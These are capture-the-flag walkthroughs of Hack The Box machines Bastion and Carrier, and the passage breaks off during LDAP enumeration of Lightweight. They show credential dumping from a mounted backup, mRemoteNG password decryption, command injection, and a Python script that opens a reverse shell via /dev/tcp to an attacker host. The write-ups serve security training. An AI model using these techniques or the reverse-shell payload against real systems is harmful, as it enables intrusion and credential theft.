HTB – Bastion

Let’s start off with our basic Nmap command to find out the open ports and services.

c:\PENTEST>nmap -Pn -sV -open 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-11 10:36 W. Europe Summer Time
Nmap scan report for 10.10.10.134
Host is up (0.015s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

SMB Enumeration

c:\PENTEST>net use \\bastion.htb\IPC$
The password or user name is invalid for \\bastion.htb\IPC$.

Enter the username for 'bastion.htb': guest
Enter the password for bastion.htb:
The command completed successfully.


c:\PENTEST>net view \\bastion.htb
Shared resources at \\bastion.htb

Share name Type Used as Comment

-------------------------------------------------------------------------------
Backups Disk
The command completed successfully.


Backups Share

c:\PENTEST>net use z: \\bastion.htb\Backups
The command completed successfully.
c:\PENTEST>z:

Z:\>dir
 Volume in drive Z has no label.
 Volume Serial Number is 0CB3-C487

 Directory of Z:\

16/04/2019  12:02    <DIR>          .
16/04/2019  12:02    <DIR>          ..
16/04/2019  12:10               116 note.txt
22/02/2019  14:43                 0 SDT65CB.tmp
22/02/2019  14:44    <DIR>          WindowsImageBackup
               2 File(s)            116 bytes
               3 Dir(s)  11.305.340.928 bytes free
Z:\>type note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

 

A Windows Image Backup is likely to be large and the transfer will be slow (as the note warns). Rather than try to copy it over, I’m going to mount this share to my filesystem.

root@kali# mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
root@kali# ls /mnt/
note.txt  SDT65CB.tmp  WindowsImageBackup

I’ll list all the files in the share:

root@kali# find /mnt/ -type f
/mnt/note.txt
/mnt/SDT65CB.tmp
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/mnt/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/mnt/WindowsImageBackup/L4mpje-PC/MediaId
/mnt/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}

I see two disk image vhd files.

Mount vhd

I’m going to mount the virtual disk files and see what I can find in them. First, I’ll install guestmount with apt install libguestfs-tools, a tool for mounting virtual hard disk files on Linux.

Now, I’ll try to mount each of the two VHD files. The first one fails:

The second one works, providing access to what looks like a Windows file system root:

root@kali# guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2/
root@kali# ls /mnt2/
'$Recycle.Bin'   autoexec.bat   config.sys  'Documents and Settings'   pagefile.sys   PerfLogs   ProgramData  'Program Files'   Recovery  'System Volume Information'   Users   Windows

Shell as l4mpje

Dump Hashes From Registry

With full access to the file system, I have access to the registry files. These files can be locked when the system is running, but I won’t have that issue on a mounted drive. In the config directory where the registry hives are stored, I’ll use secretsdump.py to dump the password hashes:

root@kali:/mnt2/Windows/System32/config# secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e4487d0421e6611a364a5028467e053c:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up... 

I’ll also notice that secretsdump.py identified a default password (or autolongon password) of “bureaulampje” for an unknown user.

Crack Hash

Submitting the NTLM hashes to crackstation returns the same password for the l4mpje account:

1557434097548

SSH

Seeing ssh on a Windows box is a bit unusual, but this seems like a good chance to use.

c:\PENTEST>ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password: bureaulampje
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bf*****6cd

Privesc to administrator

Enumeration

In looking at the installed programs on the host, mRemoteNG jumps out as interesting:

PS C:\Program Files (x86)> dir


    Directory: C:\Program Files (x86)


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        16-7-2016     15:23                Common Files
d-----        23-2-2019     09:38                Internet Explorer
d-----        16-7-2016     15:23                Microsoft.NET
da----        22-2-2019     14:01                mRemoteNG
d-----        23-2-2019     10:22                Windows Defender
d-----        23-2-2019     09:38                Windows Mail
d-----        23-2-2019     10:22                Windows Media Player
d-----        16-7-2016     15:23                Windows Multimedia Platform
d-----        16-7-2016     15:23                Windows NT
d-----        23-2-2019     10:22                Windows Photo Viewer
d-----        16-7-2016     15:23                Windows Portable Devices
d-----        16-7-2016     15:23                WindowsPowerShell

mRemoteNG is a remote connection management tool, and it allows the user to save passwords for various types of connections. There is a file in the user’s AppData directory, confCons.xml, that holds that information:

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir                                                                    
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG                                                                         

22-02-2019  15:03    <DIR>          .                                                                                           
22-02-2019  15:03    <DIR>          ..                                                                                          
22-02-2019  15:03             6.316 confCons.xml                                                                                
22-02-2019  15:02             6.194 confCons.xml.20190222-1402277353.backup                                                     
22-02-2019  15:02             6.206 confCons.xml.20190222-1402339071.backup                                                     
22-02-2019  15:02             6.218 confCons.xml.20190222-1402379227.backup                                                     
22-02-2019  15:02             6.231 confCons.xml.20190222-1403070644.backup                                                     
22-02-2019  15:03             6.319 confCons.xml.20190222-1403100488.backup                                                     
22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  15:03                51 extApps.xml                                                                                 
22-02-2019  15:03             5.217 mRemoteNG.log                                                                               
22-02-2019  15:03             2.245 pnlLayout.xml                                                                               
22-02-2019  15:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)  11.383.193.600 bytes free  

It’s xml, with encrypted versions of the passwords stored in the file:

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="9+/QC0ASX6vyu8eqAnoWf9rAqVvP8vuwonKagk7aY68lTF3pcqbgO0Lcj6E7xUwo6V47gl93CKdDTXKpYt0wOFk6" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>

I solved this box right when it was released, and the above file is what it was at that time. It seems that the file has been changed since then. It doens’t matter, the results are the same. But if you see different values from what I have, that is why. The resulting passwords will be the same.

Extract Passwords

Old Techniques

There’s a lot of articles like this and this that target an older version of the software that used a static key to decrypt the passwords. The Metasploit module abuses this as well. Starting in version 1.76, the use can now choose a master password, but there is still a default password or “mR3m”. But, the default AES block mode also changed, which leaves all the older tools still incapabile of decrpyting newer files.

Method 1: From Within mRemoteNG

I’ll open my Commando VM and install mRemoteNG. Then I’ll drop the confCons.xml file from target into C:\Users\0xdf\AppData\Roaming\mRemoteNG and re-open mRemoteNG. I’ll see two connections listed:

1557456754788

mRemoteNG doesn’t want to just tell me the passwords. However, I can use the fact that the program wants to allow me to connect it to external tools that it may not be pre-programed to work with by creating a new External Tool by going to Tools -> External Tools -> New External Tool.

In the Window that opens, I’ll add a display name, filename, and arguments as follows:

1557457036252

My external tool is just cmd, and I have it running an echo with the username and password.

Now I can right-click on a connection, go to External Tools, and Password is an option:

1557456800055

Clicking it pops a cmd window with the password at the top:

1557457064938

The password for L4mpje matches what I already know. The password for DC is new:

1557457101260

Now I have the administrtor password, “thXLHM96BeKL0ER2”.

Method 2: mremoteng-decrypt

I downloaded and ran here, and it worked:

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
User Input: OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
Use default password for cracking...
Decrypted Output: bureaulampje

root@kali:/opt/mremoteng-decrypt# java -jar decipher_mremoteng.jar V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
User Input: V22XaC5eW4epRxRgXEM5RjuQe2UNrHaZSGMUenOvA1Cit/z3v1fUfZmGMglsiaICSus+bOwJQ/4AnYAt2AeE8g==
Use default password for cracking...
Decrypted Output: thXLHM96BeKL0ER2

SSH as administrator

With that password, I can ssh in as administrator:

c:\PENTEST>ssh administrator@10.10.10.134
administrator@10.10.10.134's password:thXLHM96BeKL0ER2

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>cd desktop

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958*****5c8

HTB – Carrier

Today we are going to solve another CTF challenge “Carrier”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: The IP of Carrier is 10.10.10.105

root@carrier:/tmp# lxc list
+------+---------+---------------------+------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+---------+---------------------+------+------------+-----------+
| r1 | RUNNING | 10.99.64.2 (eth0) | | PERSISTENT | 0 |
| | | 10.78.11.1 (eth2) | | | |
| | | 10.78.10.1 (eth1) | | | |
+------+---------+---------------------+------+------------+-----------+
| r2 | RUNNING | 10.99.64.3 (eth0) | | PERSISTENT | 0 |
| | | 10.78.12.1 (eth2) | | | |
| | | 10.78.10.2 (eth1) | | | |
+------+---------+---------------------+------+------------+-----------+
| r3 | RUNNING | 10.99.64.4 (eth0) | | PERSISTENT | 0 |
| | | 10.78.12.2 (eth2) | | | |
| | | 10.78.11.2 (eth1) | | | |
| | | 10.120.15.1 (eth3) | | | |
+------+---------+---------------------+------+------------+-----------+
| web | RUNNING | 10.99.64.251 (eth0) | | PERSISTENT | 0 |
+------+---------+---------------------+------+------------+-----------+
root@carrier:/tmp#

Let’s start off with our basic Nmap command to find out the open ports and services.

c:\PENTEST>nmap -sC -sV -p- -T4 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:16 W. Europe Summer Time
Nmap scan report for 10.10.10.105
Host is up (0.024s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
| 256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_ 256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.90 seconds
c:\PENTEST>nmap -sU --min-rate=5000 -T4 10.10.10.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:19 W. Europe Summer Time
Nmap scan report for 10.10.10.105
Host is up (0.022s latency).
Not shown: 993 open|filtered ports
PORT STATE SERVICE
161/udp open snmp
3664/udp closed ups-engine
8900/udp closed jmb-cds1
17423/udp closed unknown
20762/udp closed unknown
44508/udp closed unknown
45380/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds

The Nmap scan shows us that there are 3 TCP ports are open: 21(FTP), 22(SSH), 80(HTTP) and 1 UDP port is open: 161(SNMP)

As port 161 is open we use snmpwalk to enumerate SNMP port and find a string called “SN#NET_45JDX23”.

root@kali:~/htb# snmpwalk -c public -v 1 10.10.10.105
Created directory: /var/lib/snmp/mib_indexes
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
End of MIB

1st we WFUZZ for some more info about the the open port 80,

root@kali:~/htb# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.105/FUZZ

********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.105/FUZZ
Total requests: 949

===================================================================
ID Response Lines Word Chars Payload 
===================================================================

000000223: 301 9 L 28 W 310 Ch "css" 
000000245: 301 9 L 28 W 312 Ch "debug" 
000000277: 301 9 L 28 W 310 Ch "doc" 
000000413: 301 9 L 28 W 310 Ch "img" 
000000454: 301 9 L 28 W 309 Ch "js" 
000000838: 301 9 L 28 W 312 Ch "tools"

Total time: 3.342466
Processed Requests: 949
Filtered Requests: 943
Requests/sec.: 283.9220

We try username “admin” and the string we find earlier as the password. But were unable to login but by using the password “NET_45JDX23”, we were able to login.

By checking the different options in the web application, in the diagnostic tab, we find something interesting. When we click on the “Verify status” button, we find that the server might be running “ps” command.

So further enumerate the web application, we use BurpSuite to capture the request and find inside the “check” parameter a base64 encoded string. When we decode the base64 encoded string we find the string to be called “quagga”. Now if check the web application, it is showing all the process that contains the string “quagga”. So that means the web application is running “ps” with “grep quagga” command.

Now to verify our theory, we change the check parameter to “root” and then encode it to base64 and then encode it to URL encode.

When we send the new request we find that the web application is displaying all the process that contains the string “root”.

Now we check if the web application is vulnerable to command injection or not. We try to run id command on the server.

By changing the parameter to “hack;id” and then encoding it with base64 encode and URL encode we forward the request to the server.

When we check the web application, we find that we are successfully able to run the “id” command that means the web application is vulnerable to command injection.

Now we replace the id command with nc reverse shell one-liner.

We encode the string with base64 encode and URL encode. We setup our listener and then forward the request.

As soon as we forward the request we get a reverse shell, we spawn a TTY shell and check for files in the current directory. Inside we find a file called “user.txt”, we open the file and find the first flag.

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.105: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.105] 38314: NO_DATA
bash: cannot set terminal process group (2507): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~# python3 -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"
root@r1:~#
root@r1:~# ls
ls
test_intercept.pcap user.txt
root@r1:~# cat user.txt
cat user.txt
564*****2be

Automated Script to get initial shell:

#!/usr/bin/python

"""
A script to get a reverse shell on Hack The Box retired machine - Carrier.
Write-up : https://0xrick.github.io/hack-the-box/carrier/
usage : ./shell.py [ip adress] [port]
"""
import requests
import sys
import subprocess
import base64

base_url = "http://10.10.10.105"
diag_url = "http://10.10.10.105/diag.php"
session = requests.session()
login_data = {"username" : "admin" , "password" : "NET_45JDX23"}
payload = base64.b64encode("root && bash -i >& /dev/tcp/" + sys.argv[1] + "/" + sys.argv[2] + " 0>&1")
shell_data = {"check" : payload}

session.post(base_url , data=login_data)
subprocess.Popen(["nc","-lvnp",sys.argv[2]])
session.post(diag_url , data=shell_data)

After getting a root shell we enumerated the machine, we do not find anything interesting. Going back to the tickets section on the web page, we find a hint that we need to check another subnet.

We use the ping command to find all the available machines on the subnet “10.120.15.0/24”.

root@r1:~# for i in {1..255}; do ping -c 1 10.120.15.$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done
<$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done 
10.120.15.1
10.120.15.10

Now we according to the ticket we know there is ftp server running on subnet “10.120.15.0/24”. So we scan both the IP addresses and find port 21 is open on 10.120.15.10. Further enumerating the system in cronjob we find that there is a bash script inside /opt/ directory called “restore.sh”. We take a look at the content of the file and find that the machine is working with Border Gateway Protocol (BGP) with Quagga. Now we can use a technique called BGP hijacking to take over the IP address. The bash script restores the BGP configuration every 10 minutes, so we remove executable permissions from the script so that we can make changes to the configuration of BGP

root@r1:~# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
*/10 * * * * /opt/restore.sh
root@r1:~# chmod -x /opt/restore.sh 
chmod -x /opt/restore.sh

Now we connect to the vty shell and check the current configuration.

Now switch to configure mode, and to intercept the traffic we want 10.120.15.0/25 to use our machine as the gateway.

We wait for some time then interrupt the capture and check if the pcap file has been created. Now we transfer the file to our system with netcat and analyze it with Wireshark and find the password for FTP.

We use this password to login through SSH on the target system and are successfully able to login. After logging in, we find a file called root.txt, we take a look at the content of the file and find the final flag.

credits to: https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/

Author: Jacco Straathof

HTB – Lightweight

Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sV -sT -sC lightweight.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:55 EDT
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.55% done; ETC: 02:57 (0:01:23 remaining)
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.54s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.51 seconds

Therefore, with the help of nmap NSE script we go for LDAP enumeration:

root@kali:~/htb/lightweight# nmap -Pn -p 389 --script ldap-search 10.10.10.119
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:57 EDT
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.026s latency).

PORT STATE SERVICE
389/tcp open ldap
| ldap-search: 
| Context: dc=lightweight,dc=htb
| dn: dc=lightweight,dc=htb
| objectClass: top
| objectClass: dcObject
| objectClass: organization
| o: lightweight htb
| dc: lightweight
| dn: cn=Manager,dc=lightweight,dc=htb
| objectClass: organizationalRole
| cn: Manager
| description: Directory Manager
| dn: ou=People,dc=lightweight,dc=htb
| objectClass: organizationalUnit
| ou: People
| dn: ou=Group,dc=lightweight,dc=htb
| objectClass: organizationalUnit
| ou: Group
| dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
| uid: ldapuser1
| cn: ldapuser1
| sn: ldapuser1
| mail: ldapuser1@lightweight.htb
| objectClass: person
| objectClass: organizationalPerson
| objectClass: inetOrgPerson
| objectClass: posixAccount
| objectClass: top
